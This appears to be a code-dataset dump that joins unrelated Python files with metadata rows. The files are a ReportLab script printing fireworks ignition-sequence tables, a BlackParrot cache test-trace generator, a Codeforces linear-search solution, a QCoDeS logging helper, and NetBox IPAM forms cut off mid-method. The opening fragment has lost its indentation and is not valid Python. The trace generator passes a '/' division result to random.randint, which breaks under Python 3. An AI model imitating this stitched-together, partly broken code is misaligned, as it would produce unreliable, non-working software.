                # append the fields in the same order as the column headers above
                b.append(row2.BoxID)
                b.append(row1.ConnectorID)
                b.append(row3.Size)
                b.append(row3.RisingHeight)
                b.append(row3.Name)
            elif self.table == TABLEProductList:
                b.append(row3.ItemNo)
                b.append(row3.Size)
                b.append(row3.Type)
                b.append(row3.Name)
            elif self.table == TABLEFireSequence:
                b.append(row2.BoxID)
                b.append(row1.IgnitionTime)
                b.append(row2.FieldID)
                b.append(row3.Name)
            # write the relevant fields into the row according to the table type
            a.append(b)
            # append row b to the two-dimensional array a
        self.creatTable(a)
        # call creatTable to build the PDF
def Pages(self,canvas,doc):
canvas.saveState()
canvas.drawString((doc.pagesize[0]/2)-5,25,u'%d'%(doc.page))
canvas.restoreState()
    # helper that draws the page number in the footer of every page
def creatTable(self, data):
elements = []
styles = getSampleStyleSheet()
if self.table == TABLEFields:
doc = SimpleDocTemplate(os.path.join (appdata, 'pdf', 'Fields.pdf'), pagesize = pagesizes.A4)
            # set the output file name and page size
pwidth = (doc.pagesize[0] - 20) / 1000
            # divide the page width into 1000 equal units
elements.append(Paragraph('Field', styles['Title']))
            # set the table title
colwidths = (pwidth*120,pwidth*120,pwidth*120,pwidth*120,pwidth*120)
            # set the number of table columns and the width of each column
table1 = Table(data, colwidths)
table1.setStyle(TableStyle([('ALIGN',(0,0),(-1,-1),'CENTER'),
('GRID',(0,0),(-1,-1),0.5,colors.black)]))
            # set the table style (alignment and grid)
elements.append(table1)
elif self.table == TABLEProductList:
doc = SimpleDocTemplate(os.path.join (appdata, 'pdf', 'ProductList.pdf'), pagesize = pagesizes.A4)
pwidth = (doc.pagesize[0] - 20) / 1000
elements.append(Paragraph('ProductList', styles['Title']))
colwidths = (pwidth*120,pwidth*120,pwidth*120,pwidth*120)
table2 = Table(data, colwidths)
table2.setStyle(TableStyle([('ALIGN',(0,0),(-1,-1),'CENTER'),
('GRID',(0,0),(-1,-1),0.5,colors.black)]))
elements.append(table2)
elif self.table == TABLEFireSequence:
doc = SimpleDocTemplate(os.path.join (appdata, 'pdf', 'FireSequence.pdf'), pagesize = pagesizes.A4)
pwidth = (doc.pagesize[0] - 20) / 1000
elements.append(Paragraph('FireSequence', styles['Title']))
colwidths = (pwidth*130,pwidth*130,pwidth*130,pwidth*130)
table3 = Table(data, colwidths)
table3.setStyle(TableStyle([('ALIGN',(0,0),(-1,-1),'CENTER'),
('GRID',(0,0),(-1,-1),0.5,colors.black)]))
elements.append(table3)
else:
return
doc.build(elements,onFirstPage=self.Pages,onLaterPages=self.Pages)
        # build the report
if __name__=='__main__':
    sess = session()
    sess1 = session1()
    base.metadata.create_all (engine)
    base1.metadata.create_all (engine1)
    ptable = PrintTable(sess, sess1, TABLEFields)
    # instantiate the class with both DB sessions and the table type to print
# a1 = [['BoxID','ConnectorID','Size','RisingHeight','Name']]
# a2 = [['ItemNo','Size','Type','Name']]
# a3 = [['BoxID','IgnitionTime','FieldID','Name']]
#
# with sess1.begin():
# data1 = sess1.query(ScriptData).all()
#
# for row1 in data1:
# with sess1.begin():
# row2 = sess1.query(IgnitorsData).filter_by(UUID = row1.IgnitorID).first()
# with sess.begin():
# row3 = sess.query(FireworksData).filter_by(UUID = row1.FireworkID).first()
#
# b1 = []
# b1.append(row2.BoxID)
# b1.append(row3.RisingHeight)
# b1.append(row3.Name)
# b1.append(row3.Size)
# b1.append(row1.ConnectorID)
# a1.append(b1)
#
# b2 = []
# b2.append(row3.Type)
# b2.append(row3.ItemNo)
# b2.append(row3.Name)
# b2.append(row3.Size)
# a2.append(b2)
#
# b3 = []
# b3.append(row2.BoxID)
# b3.append(row1.IgnitionTime)
# b3.append(row3.Name)
# b3.append(row2.FieldID)
# a3.append(b3)
#
# ptable.creatTable(a1, a2, a3)
| 36.575
| 112
| 0.542208
|
0ccadc251e8bb647061654d8b547522498f5b268
| 8,011
|
py
|
Python
|
bp_me/test/tb/bp_cce/test_gen.py
|
wantan244/black-parrot
|
dd2d8453a49b0f069e96f175afe97968dac205e1
|
[
"BSD-3-Clause"
] | 236
|
2020-02-24T20:42:36.000Z
|
2022-03-29T13:25:09.000Z
|
bp_me/test/tb/bp_cce/test_gen.py
|
wantan244/black-parrot
|
dd2d8453a49b0f069e96f175afe97968dac205e1
|
[
"BSD-3-Clause"
] | 502
|
2020-02-21T13:23:30.000Z
|
2022-03-31T15:57:21.000Z
|
bp_me/test/tb/bp_cce/test_gen.py
|
wantan244/black-parrot
|
dd2d8453a49b0f069e96f175afe97968dac205e1
|
[
"BSD-3-Clause"
] | 109
|
2020-02-24T20:42:50.000Z
|
2022-03-29T05:52:32.000Z
|
from __future__ import print_function
import sys
import random
import math
import os
from trace_gen import TraceGen
from test_memory import TestMemory
# Test Generator class
# a test is defined as a sequence of load and store operation tuples
# Each operation tuple is: (store, address, size in bytes, uncached, value)
# If store=True, op is a store, else op is a load
# size is in bytes, and must be 1, 2, 4, or 8
# If uncached=1, op is an uncached access, else it is a cached access
# value is the store value or expected load value
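# For illustration only (addresses and values here are arbitrary), a minimal
# two-operation sequence for a single LCE and the call that writes it out:
#   ops = {0: [(True,  0x80000000, 8, 0, 1),    # store 1 (8B, cached)
#              (False, 0x80000000, 8, 0, 1)]}   # load it back, expect 1
#   TestGenerator(out_dir='.', trace_file='demo').generateTrace(ops)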
class TestGenerator(object):
def __init__(self, paddr_width=40, data_width=64, num_lce=1, out_dir='.', trace_file='test', debug=False):
self.paddr_width = paddr_width
self.data_width = data_width
self.tg = TraceGen(addr_width_p=self.paddr_width, data_width_p=self.data_width)
self.num_lce = num_lce
self.out_dir = out_dir
self.trace_file = trace_file
self.debug = debug
def eprint(self, *args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def generateTrace(self, ops):
for lce in ops:
file_name = '{0}_{1}.tr'.format(self.trace_file, lce)
with open(os.path.join(self.out_dir, file_name), 'w') as lce_trace_file:
# preamble
lce_trace_file.write(self.tg.print_header())
lce_trace_file.write(self.tg.wait(100))
for (st,addr,size,uc,val) in ops[lce]:
if st:
lce_trace_file.write(self.tg.send_store(size=size, addr=addr, data=val, uc=uc))
lce_trace_file.write(self.tg.recv_data(addr=addr, data=0, uc=uc))
else:
# TODO: signed operations
lce_trace_file.write(self.tg.send_load(signed=0, size=size, addr=addr, uc=uc))
lce_trace_file.write(self.tg.recv_data(addr=addr, data=val, uc=uc))
# test end
lce_trace_file.write(self.tg.test_done())
# single cached store
def storeTest(self, mem_base=0):
addr = mem_base
return [(True, addr, 8, 0, 1)]
# cached store/load pair
def loadTest(self, mem_base=0):
addr = mem_base
return [(True, addr, 8, 0, 1), (False, addr, 8, 0, 1)]
# fill a cache set with stores
# evict an entry
# load back the entry
def setTest(self, mem_base=0, assoc=8, sets=64, block_size=64):
ops = []
addr = mem_base
# blocks in same set are separated by (sets*block_size) in byte-addressable memory
stride = sets*block_size
store_val = 1
for i in range(assoc+1):
ops.append((True, addr, 8, 0, store_val))
addr += stride
store_val += 1
ops.append((False, mem_base, 8, 0, 1))
return ops
# Random loads and stores to a single set (set 0)
def setHammerTest(self, N=16, mem_base=0, mem_bytes=1024, mem_block_size=64, mem_size=2, assoc=8, sets=64, seed=0, lce_mode=0):
# test begin
random.seed(seed)
ops = []
mem = TestMemory(mem_base, mem_bytes, mem_block_size, self.debug)
# compute block addresses for all blocks mapping to set 0
blocks = [i*sets*mem_block_size for i in range(assoc*mem_size)]
store_val = 1
for i in range(N):
# pick access parameters
store = random.choice([True, False])
size = random.choice([1, 2, 4, 8])
size_shift = int(math.log(size, 2))
# determine type of request (cached or uncached)
uncached_req = 0
if lce_mode == 2:
uncached_req = random.choice([0,1])
elif lce_mode == 1:
uncached_req = 1
# choose which cache block in memory to target
block = random.choice(blocks)
# choose offset in cache block based on size of access ("word" size for this access)
words = mem_block_size / size
word = random.randint(0, words-1)
# build the address
addr = block + (word << size_shift) + mem_base
mem.check_valid_addr(addr)
val = 0
if store:
# NOTE: the value being stored will be truncated to size number of bytes
store_val_trunc = store_val
if (size < 8):
store_val_trunc = store_val_trunc & ~(~0 << (size*8))
mem.write_memory(addr, store_val_trunc, size)
val = store_val_trunc
store_val += 1
else:
val = mem.read_memory(addr, size)
ops.append((store, addr, size, uncached_req, val))
return ops
# Random loads and stores to a single cache block
def blockTest(self, N=16, mem_base=0, block_size=64, seed=0):
return self.randomTest(N, mem_base, block_size, block_size, seed, 0)
# Random Test generator
# N is number of operations
# lce_mode = 0, 1, or 2 -> 0 = cached only, 1 = uncached only, 2 = mixed
def randomTest(self, N=16, mem_base=0, mem_bytes=1024, mem_block_size=64, seed=0, lce_mode=0):
# test begin
random.seed(seed)
ops = []
mem = TestMemory(mem_base, mem_bytes, mem_block_size, self.debug)
mem_blocks = mem_bytes / mem_block_size
b = int(math.log(mem_block_size, 2))
store_val = 1
for i in range(N):
# pick access parameters
store = random.choice([True, False])
size = random.choice([1, 2, 4, 8])
size_shift = int(math.log(size, 2))
# determine type of request (cached or uncached)
uncached_req = 0
if lce_mode == 2:
uncached_req = random.choice([0,1])
elif lce_mode == 1:
uncached_req = 1
# choose which cache block in memory to target
block = random.randint(0, mem_blocks-1)
# choose offset in cache block based on size of access ("word" size for this access)
words = mem_block_size / size
word = random.randint(0, words-1)
# build the address
addr = (block << b) + (word << size_shift) + mem_base
mem.check_valid_addr(addr)
val = 0
if store:
# NOTE: the value being stored will be truncated to size number of bytes
store_val_trunc = store_val
if (size < 8):
store_val_trunc = store_val_trunc & ~(~0 << (size*8))
mem.write_memory(addr, store_val_trunc, size)
val = store_val_trunc
store_val += 1
else:
val = mem.read_memory(addr, size)
ops.append((store, addr, size, uncached_req, val))
# return the test operations
return ops
# AXE Test generator
# N is number of operations per LCE
# lce_mode = 0, 1, or 2 -> 0 = cached only, 1 = uncached only, 2 = mixed
def axeTest(self, lce=1, N=16, mem_base=0, mem_bytes=1024, mem_block_size=64, seed=0, lce_mode=0):
# test begin
random.seed(seed)
ops = {i:[] for i in range(lce)}
mem = TestMemory(mem_base, mem_bytes, mem_block_size, self.debug)
mem_blocks = mem_bytes / mem_block_size
b = int(math.log(mem_block_size, 2))
store_val = 1
for i in range(N):
for l in range(lce):
# pick access parameters
store = random.choice([True, False])
# all accesses are size 8B for AXE tracing
size = 8
size_shift = int(math.log(size, 2))
# determine type of request (cached or uncached)
uncached_req = 0
if lce_mode == 2:
uncached_req = random.choice([0,1])
elif lce_mode == 1:
uncached_req = 1
# choose which cache block in memory to target
block = random.randint(0, mem_blocks-1)
# choose offset in cache block based on size of access ("word" size for this access)
words = mem_block_size / size
word = random.randint(0, words-1)
# build the address
addr = (block << b) + (word << size_shift) + mem_base
mem.check_valid_addr(addr)
val = 0
if store:
# NOTE: the value being stored will be truncated to size number of bytes
store_val_trunc = store_val
if (size < 8):
store_val_trunc = store_val_trunc & ~(~0 << (size*8))
val = store_val_trunc
store_val += 1
else:
# loads return 0 for AXE tracing
val = 0
ops[l].append((store, addr, size, uncached_req, val))
# return the test operations
return ops
| 35.763393
| 129
| 0.634627
|
e1ff26ec50243465ac3367fa497ab8132dfc294f
| 3,716
|
py
|
Python
|
Coding/Competitive_Coding/CodeForces/0 - 1300/Effective_Approach.py
|
Phantom586/My_Codes
|
900c4e5e95ab833e4f78f1594e3b25178a74f1a7
|
[
"MIT"
] | null | null | null |
Coding/Competitive_Coding/CodeForces/0 - 1300/Effective_Approach.py
|
Phantom586/My_Codes
|
900c4e5e95ab833e4f78f1594e3b25178a74f1a7
|
[
"MIT"
] | null | null | null |
Coding/Competitive_Coding/CodeForces/0 - 1300/Effective_Approach.py
|
Phantom586/My_Codes
|
900c4e5e95ab833e4f78f1594e3b25178a74f1a7
|
[
"MIT"
] | null | null | null |
# Once at a team training Vasya, Petya and Sasha got a problem on implementing linear search in an array.
# According to the boys, linear search works as follows. The array elements in a pre-selected order are in turn compared
# with the number that you need to find. Once you find the array element that is equal to the required one, the search
# ends. The efficiency of the algorithm is the number of performed comparisons. The fewer comparisons the linear search
# has made, the more effective it is.
# Vasya believes that a linear search would work better if it sequentially iterates through the elements, starting with
# the 1-st one (in this problem we consider the elements of the array indexed from 1 to n) and ending with the n-th one.
# And Petya says that Vasya is wrong: the search will need less comparisons if it sequentially iterates the elements
# starting from the n-th and ending with the 1-st one. Sasha argues that the two approaches are equivalent.
# To finally begin the task, the teammates decided to settle the debate and compare the two approaches on an example.
# For this, they took an array that is a permutation of integers from 1 to n, and generated m queries of the form:
# find element with value bi in the array. They want to calculate for both approaches how many comparisons in total
# the linear search will need to respond to all queries. If the first search needs fewer comparisons, then the winner
# of the dispute is Vasya. If the second one does, then the winner is Petya. If both approaches make the same number
# of comparisons, then Sasha's got the upper hand.
# But the problem is, linear search is too slow. That's why the boys aren't going to find out who is right before the
# end of the training, unless you come in here. Help them to determine who will win the dispute.
# Input
# The first line contains integer n (1 ≤ n ≤ 10^5) — the number of elements in the array. The second line contains n
# distinct space-separated integers a1, a2, ..., an (1 ≤ ai ≤ n) — the elements of array.
# The third line contains integer m (1 ≤ m ≤ 10^5) — the number of queries. The last line contains m space-separated
# integers b1, b2, ..., bm (1 ≤ bi ≤ n) — the search queries. Note that the queries can repeat.
# Output
# Print two integers, showing how many comparisons Vasya's approach needs and how many comparisons Petya's approach
# needs. Separate the numbers by spaces.
# Please, do not use the %lld specifier to read or write 64-bit integers in C++. It is preferred to use cin, cout
# streams or the %I64d specifier.
# Examples
# inputCopy
# 2
# 1 2
# 1
# 1
# outputCopy
# 1 2
# inputCopy
# 2
# 2 1
# 1
# 1
# outputCopy
# 2 1
# inputCopy
# 3
# 3 1 2
# 3
# 1 2 3
# outputCopy
# 6 6
# Note
# In the first sample Vasya's approach will make one comparison (it starts with the 1-st element and immediately finds
# the required number), and Petya's approach makes two comparisons (first he compares with the 2-nd array element,
# doesn't find the search item and compares with the 1-st element).
# In the second sample, on the contrary, Vasya's approach will need two comparisons (first with 1-st element, and then
# with the 2-nd), and Petya's approach will find the required value in one comparison (the first comparison with
# the 2-nd element)
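# Approach: the value b sits at some 1-based position pos[b] in the array, so Vasya
# (scanning from the front) needs pos[b] comparisons for that query and Petya
# (scanning from the back) needs n - pos[b] + 1. Precomputing every position makes
# each query O(1). For example, for the array [3, 1, 2] and query 1: pos[1] = 2,
# so Vasya makes 2 comparisons and Petya makes 3 - 2 + 1 = 2.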
n = int(input())
lst = list(map(int, input().split()))
queries = int(input())
q_lst = list(map(int, input().split()))
pos = [0] * (n + 1)
for idx, val in enumerate(lst, start=1):
    pos[val] = idx
vasya_comparisons = 0
petya_comparisons = 0
for b in q_lst:
    vasya_comparisons += pos[b]
    petya_comparisons += n - pos[b] + 1
print(vasya_comparisons, petya_comparisons)
| 44.771084
| 120
| 0.730893
|
c5fa2eb94412e0dbece6b57a86d3d9f8867c5997
| 2,305
|
py
|
Python
|
qdev_wrappers/logger.py
|
lillian542/qdev-wrappers
|
4b691eba7ff19de8a8fb6f0b97d350710dece018
|
[
"MIT"
] | null | null | null |
qdev_wrappers/logger.py
|
lillian542/qdev-wrappers
|
4b691eba7ff19de8a8fb6f0b97d350710dece018
|
[
"MIT"
] | null | null | null |
qdev_wrappers/logger.py
|
lillian542/qdev-wrappers
|
4b691eba7ff19de8a8fb6f0b97d350710dece018
|
[
"MIT"
] | null | null | null |
import logging
import logging.handlers
import os
from IPython import get_ipython
from qcodes import config
log = logging.getLogger(__name__)
logging_dir = "logs"
history_log_name = "history.log"
python_log_name = 'pythonlog.log'
def start_python_logger() -> None:
"""
Logging of messages passed throug the python logging module
This sets up logging to a time based logging.
This means that all logging messages on or above
filelogginglevel will be written to pythonlog.log
All logging messages on or above consolelogginglevel
will be written to stderr.
"""
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
try:
filelogginglevel = config.core.file_loglevel
except KeyError:
filelogginglevel = "INFO"
consolelogginglevel = config.core.loglevel
ch = logging.StreamHandler()
ch.setLevel(consolelogginglevel)
ch.setFormatter(formatter)
filename = os.path.join(config.user.mainfolder,
logging_dir,
python_log_name)
os.makedirs(os.path.dirname(filename), exist_ok=True)
fh1 = logging.handlers.TimedRotatingFileHandler(filename,
when='midnight')
fh1.setLevel(filelogginglevel)
fh1.setFormatter(formatter)
logging.basicConfig(handlers=[ch, fh1], level=logging.DEBUG)
# capture any warnings from the warnings module
logging.captureWarnings(capture=True)
log.info("QCoDes python logger setup")
def start_command_history_logger():
"""
    Logging of the history of the interactive command shell.
    Works only with IPython.
"""
ipython = get_ipython()
if ipython is None:
        raise RuntimeError("History can't be saved. "
                           "Refusing to proceed (use IPython/Jupyter).")
ipython.magic("%logstop")
filename = os.path.join(config.user.mainfolder,
logging_dir,
history_log_name)
os.makedirs(os.path.dirname(filename), exist_ok=True)
ipython.magic("%logstart -t -o {} {}".format(filename, "append"))
log.info("Started logging IPython history")
def start_logging():
start_python_logger()
start_command_history_logger()
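# Minimal usage sketch (assumes a qcodes config that defines user.mainfolder and
# core.loglevel, which the functions above read):
#   from qdev_wrappers.logger import start_logging
#   start_logging()  # file + console logging and IPython history logging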
| 32.928571
| 72
| 0.663774
|
3353d981f6b15a5a92c3520b47ebcef094fab5d7
| 31,386
|
py
|
Python
|
netbox/ipam/forms.py
|
ChrisdAutume/netbox
|
bcb1d9af0be7ae8bd1236b9b7a0e3c98f41e8f4a
|
[
"Apache-2.0"
] | 1
|
2018-07-31T06:54:02.000Z
|
2018-07-31T06:54:02.000Z
|
netbox/ipam/forms.py
|
ChrisdAutume/netbox
|
bcb1d9af0be7ae8bd1236b9b7a0e3c98f41e8f4a
|
[
"Apache-2.0"
] | null | null | null |
netbox/ipam/forms.py
|
ChrisdAutume/netbox
|
bcb1d9af0be7ae8bd1236b9b7a0e3c98f41e8f4a
|
[
"Apache-2.0"
] | 1
|
2019-02-19T22:04:10.000Z
|
2019-02-19T22:04:10.000Z
|
from __future__ import unicode_literals
from django import forms
from django.core.exceptions import MultipleObjectsReturned
from django.db.models import Count
from dcim.models import Site, Rack, Device, Interface
from extras.forms import CustomFieldForm, CustomFieldBulkEditForm, CustomFieldFilterForm
from tenancy.forms import TenancyForm
from tenancy.models import Tenant
from utilities.forms import (
AnnotatedMultipleChoiceField, APISelect, BootstrapMixin, BulkEditNullBooleanSelect, ChainedModelChoiceField,
CSVChoiceField, ExpandableIPAddressField, FilterChoiceField, FlexibleModelChoiceField, Livesearch, ReturnURLForm,
SlugField, add_blank_choice,
)
from virtualization.models import VirtualMachine
from .constants import IPADDRESS_ROLE_CHOICES, IPADDRESS_STATUS_CHOICES, PREFIX_STATUS_CHOICES, VLAN_STATUS_CHOICES
from .models import Aggregate, IPAddress, Prefix, RIR, Role, Service, VLAN, VLANGroup, VRF
IP_FAMILY_CHOICES = [
('', 'All'),
(4, 'IPv4'),
(6, 'IPv6'),
]
PREFIX_MASK_LENGTH_CHOICES = add_blank_choice([(i, i) for i in range(1, 128)])
IPADDRESS_MASK_LENGTH_CHOICES = add_blank_choice([(i, i) for i in range(1, 129)])
#
# VRFs
#
class VRFForm(BootstrapMixin, TenancyForm, CustomFieldForm):
class Meta:
model = VRF
fields = ['name', 'rd', 'enforce_unique', 'description', 'tenant_group', 'tenant']
labels = {
'rd': "RD",
}
help_texts = {
'rd': "Route distinguisher in any format",
}
class VRFCSVForm(forms.ModelForm):
tenant = forms.ModelChoiceField(
queryset=Tenant.objects.all(),
required=False,
to_field_name='name',
help_text='Name of assigned tenant',
error_messages={
'invalid_choice': 'Tenant not found.',
}
)
class Meta:
model = VRF
fields = VRF.csv_headers
help_texts = {
'name': 'VRF name',
}
class VRFBulkEditForm(BootstrapMixin, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(queryset=VRF.objects.all(), widget=forms.MultipleHiddenInput)
tenant = forms.ModelChoiceField(queryset=Tenant.objects.all(), required=False)
enforce_unique = forms.NullBooleanField(
required=False, widget=BulkEditNullBooleanSelect, label='Enforce unique space'
)
description = forms.CharField(max_length=100, required=False)
class Meta:
nullable_fields = ['tenant', 'description']
class VRFFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = VRF
q = forms.CharField(required=False, label='Search')
tenant = FilterChoiceField(
queryset=Tenant.objects.annotate(filter_count=Count('vrfs')),
to_field_name='slug',
null_label='-- None --'
)
#
# RIRs
#
class RIRForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = RIR
fields = ['name', 'slug', 'is_private']
class RIRCSVForm(forms.ModelForm):
slug = SlugField()
class Meta:
model = RIR
fields = RIR.csv_headers
help_texts = {
'name': 'RIR name',
}
class RIRFilterForm(BootstrapMixin, forms.Form):
is_private = forms.NullBooleanField(required=False, label='Private', widget=forms.Select(choices=[
('', '---------'),
('True', 'Yes'),
('False', 'No'),
]))
#
# Aggregates
#
class AggregateForm(BootstrapMixin, CustomFieldForm):
class Meta:
model = Aggregate
fields = ['prefix', 'rir', 'date_added', 'description']
help_texts = {
'prefix': "IPv4 or IPv6 network",
'rir': "Regional Internet Registry responsible for this prefix",
'date_added': "Format: YYYY-MM-DD",
}
class AggregateCSVForm(forms.ModelForm):
rir = forms.ModelChoiceField(
queryset=RIR.objects.all(),
to_field_name='name',
help_text='Name of parent RIR',
error_messages={
'invalid_choice': 'RIR not found.',
}
)
class Meta:
model = Aggregate
fields = Aggregate.csv_headers
class AggregateBulkEditForm(BootstrapMixin, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(queryset=Aggregate.objects.all(), widget=forms.MultipleHiddenInput)
rir = forms.ModelChoiceField(queryset=RIR.objects.all(), required=False, label='RIR')
date_added = forms.DateField(required=False)
description = forms.CharField(max_length=100, required=False)
class Meta:
nullable_fields = ['date_added', 'description']
class AggregateFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = Aggregate
q = forms.CharField(required=False, label='Search')
family = forms.ChoiceField(required=False, choices=IP_FAMILY_CHOICES, label='Address Family')
rir = FilterChoiceField(
queryset=RIR.objects.annotate(filter_count=Count('aggregates')),
to_field_name='slug',
label='RIR'
)
#
# Roles
#
class RoleForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = Role
fields = ['name', 'slug']
class RoleCSVForm(forms.ModelForm):
slug = SlugField()
class Meta:
model = Role
fields = Role.csv_headers
help_texts = {
'name': 'Role name',
}
#
# Prefixes
#
class PrefixForm(BootstrapMixin, TenancyForm, CustomFieldForm):
site = forms.ModelChoiceField(
queryset=Site.objects.all(),
required=False,
label='Site',
widget=forms.Select(
attrs={'filter-for': 'vlan_group', 'nullable': 'true'}
)
)
vlan_group = ChainedModelChoiceField(
queryset=VLANGroup.objects.all(),
chains=(
('site', 'site'),
),
required=False,
label='VLAN group',
widget=APISelect(
api_url='/api/ipam/vlan-groups/?site_id={{site}}',
attrs={'filter-for': 'vlan', 'nullable': 'true'}
)
)
vlan = ChainedModelChoiceField(
queryset=VLAN.objects.all(),
chains=(
('site', 'site'),
('group', 'vlan_group'),
),
required=False,
label='VLAN',
widget=APISelect(
api_url='/api/ipam/vlans/?site_id={{site}}&group_id={{vlan_group}}', display_field='display_name'
)
)
class Meta:
model = Prefix
fields = ['prefix', 'vrf', 'site', 'vlan', 'status', 'role', 'is_pool', 'description', 'tenant_group', 'tenant']
def __init__(self, *args, **kwargs):
# Initialize helper selectors
instance = kwargs.get('instance')
initial = kwargs.get('initial', {}).copy()
if instance and instance.vlan is not None:
initial['vlan_group'] = instance.vlan.group
kwargs['initial'] = initial
super(PrefixForm, self).__init__(*args, **kwargs)
self.fields['vrf'].empty_label = 'Global'
class PrefixCSVForm(forms.ModelForm):
vrf = forms.ModelChoiceField(
queryset=VRF.objects.all(),
required=False,
to_field_name='rd',
help_text='Route distinguisher of parent VRF',
error_messages={
'invalid_choice': 'VRF not found.',
}
)
tenant = forms.ModelChoiceField(
queryset=Tenant.objects.all(),
required=False,
to_field_name='name',
help_text='Name of assigned tenant',
error_messages={
'invalid_choice': 'Tenant not found.',
}
)
site = forms.ModelChoiceField(
queryset=Site.objects.all(),
required=False,
to_field_name='name',
help_text='Name of parent site',
error_messages={
'invalid_choice': 'Site not found.',
}
)
vlan_group = forms.CharField(
help_text='Group name of assigned VLAN',
required=False
)
vlan_vid = forms.IntegerField(
help_text='Numeric ID of assigned VLAN',
required=False
)
status = CSVChoiceField(
choices=PREFIX_STATUS_CHOICES,
help_text='Operational status'
)
role = forms.ModelChoiceField(
queryset=Role.objects.all(),
required=False,
to_field_name='name',
help_text='Functional role',
error_messages={
'invalid_choice': 'Invalid role.',
}
)
class Meta:
model = Prefix
fields = Prefix.csv_headers
def clean(self):
super(PrefixCSVForm, self).clean()
site = self.cleaned_data.get('site')
vlan_group = self.cleaned_data.get('vlan_group')
vlan_vid = self.cleaned_data.get('vlan_vid')
# Validate VLAN
if vlan_group and vlan_vid:
try:
self.instance.vlan = VLAN.objects.get(site=site, group__name=vlan_group, vid=vlan_vid)
except VLAN.DoesNotExist:
if site:
raise forms.ValidationError("VLAN {} not found in site {} group {}".format(
vlan_vid, site, vlan_group
))
else:
raise forms.ValidationError("Global VLAN {} not found in group {}".format(vlan_vid, vlan_group))
except MultipleObjectsReturned:
raise forms.ValidationError(
"Multiple VLANs with VID {} found in group {}".format(vlan_vid, vlan_group)
)
elif vlan_vid:
try:
self.instance.vlan = VLAN.objects.get(site=site, group__isnull=True, vid=vlan_vid)
except VLAN.DoesNotExist:
if site:
raise forms.ValidationError("VLAN {} not found in site {}".format(vlan_vid, site))
else:
raise forms.ValidationError("Global VLAN {} not found".format(vlan_vid))
except MultipleObjectsReturned:
raise forms.ValidationError("Multiple VLANs with VID {} found".format(vlan_vid))
class PrefixBulkEditForm(BootstrapMixin, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(queryset=Prefix.objects.all(), widget=forms.MultipleHiddenInput)
site = forms.ModelChoiceField(queryset=Site.objects.all(), required=False)
vrf = forms.ModelChoiceField(queryset=VRF.objects.all(), required=False, label='VRF')
tenant = forms.ModelChoiceField(queryset=Tenant.objects.all(), required=False)
status = forms.ChoiceField(choices=add_blank_choice(PREFIX_STATUS_CHOICES), required=False)
role = forms.ModelChoiceField(queryset=Role.objects.all(), required=False)
is_pool = forms.NullBooleanField(required=False, widget=BulkEditNullBooleanSelect, label='Is a pool')
description = forms.CharField(max_length=100, required=False)
class Meta:
nullable_fields = ['site', 'vrf', 'tenant', 'role', 'description']
class PrefixFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = Prefix
q = forms.CharField(required=False, label='Search')
within_include = forms.CharField(required=False, label='Search within', widget=forms.TextInput(attrs={
'placeholder': 'Prefix',
}))
family = forms.ChoiceField(required=False, choices=IP_FAMILY_CHOICES, label='Address family')
mask_length = forms.ChoiceField(required=False, choices=PREFIX_MASK_LENGTH_CHOICES, label='Mask length')
vrf = FilterChoiceField(
queryset=VRF.objects.annotate(filter_count=Count('prefixes')),
to_field_name='rd',
label='VRF',
null_label='-- Global --'
)
tenant = FilterChoiceField(
queryset=Tenant.objects.annotate(filter_count=Count('prefixes')),
to_field_name='slug',
null_label='-- None --'
)
status = AnnotatedMultipleChoiceField(
choices=PREFIX_STATUS_CHOICES,
annotate=Prefix.objects.all(),
annotate_field='status',
required=False
)
site = FilterChoiceField(
queryset=Site.objects.annotate(filter_count=Count('prefixes')),
to_field_name='slug',
null_label='-- None --'
)
role = FilterChoiceField(
queryset=Role.objects.annotate(filter_count=Count('prefixes')),
to_field_name='slug',
null_label='-- None --'
)
expand = forms.BooleanField(required=False, label='Expand prefix hierarchy')
#
# IP addresses
#
class IPAddressForm(BootstrapMixin, TenancyForm, ReturnURLForm, CustomFieldForm):
interface = forms.ModelChoiceField(
queryset=Interface.objects.all(),
required=False
)
nat_site = forms.ModelChoiceField(
queryset=Site.objects.all(),
required=False,
label='Site',
widget=forms.Select(
attrs={'filter-for': 'nat_rack'}
)
)
nat_rack = ChainedModelChoiceField(
queryset=Rack.objects.all(),
chains=(
('site', 'nat_site'),
),
required=False,
label='Rack',
widget=APISelect(
api_url='/api/dcim/racks/?site_id={{nat_site}}',
display_field='display_name',
attrs={'filter-for': 'nat_device', 'nullable': 'true'}
)
)
nat_device = ChainedModelChoiceField(
queryset=Device.objects.all(),
chains=(
('site', 'nat_site'),
('rack', 'nat_rack'),
),
required=False,
label='Device',
widget=APISelect(
api_url='/api/dcim/devices/?site_id={{nat_site}}&rack_id={{nat_rack}}',
display_field='display_name',
attrs={'filter-for': 'nat_inside'}
)
)
nat_inside = ChainedModelChoiceField(
queryset=IPAddress.objects.all(),
chains=(
('interface__device', 'nat_device'),
),
required=False,
label='IP Address',
widget=APISelect(
api_url='/api/ipam/ip-addresses/?device_id={{nat_device}}',
display_field='address'
)
)
livesearch = forms.CharField(
required=False,
label='Search',
widget=Livesearch(
query_key='q',
query_url='ipam-api:ipaddress-list',
field_to_update='nat_inside',
obj_label='address'
)
)
primary_for_parent = forms.BooleanField(required=False, label='Make this the primary IP for the device/VM')
class Meta:
model = IPAddress
fields = [
'address', 'vrf', 'status', 'role', 'description', 'interface', 'primary_for_parent', 'nat_site',
'nat_rack', 'nat_inside', 'tenant_group', 'tenant',
]
def __init__(self, *args, **kwargs):
# Initialize helper selectors
instance = kwargs.get('instance')
initial = kwargs.get('initial', {}).copy()
if instance and instance.nat_inside and instance.nat_inside.device is not None:
initial['nat_site'] = instance.nat_inside.device.site
initial['nat_rack'] = instance.nat_inside.device.rack
initial['nat_device'] = instance.nat_inside.device
kwargs['initial'] = initial
super(IPAddressForm, self).__init__(*args, **kwargs)
self.fields['vrf'].empty_label = 'Global'
# Limit interface selections to those belonging to the parent device/VM
if self.instance and self.instance.interface:
self.fields['interface'].queryset = Interface.objects.filter(
device=self.instance.interface.device, virtual_machine=self.instance.interface.virtual_machine
)
else:
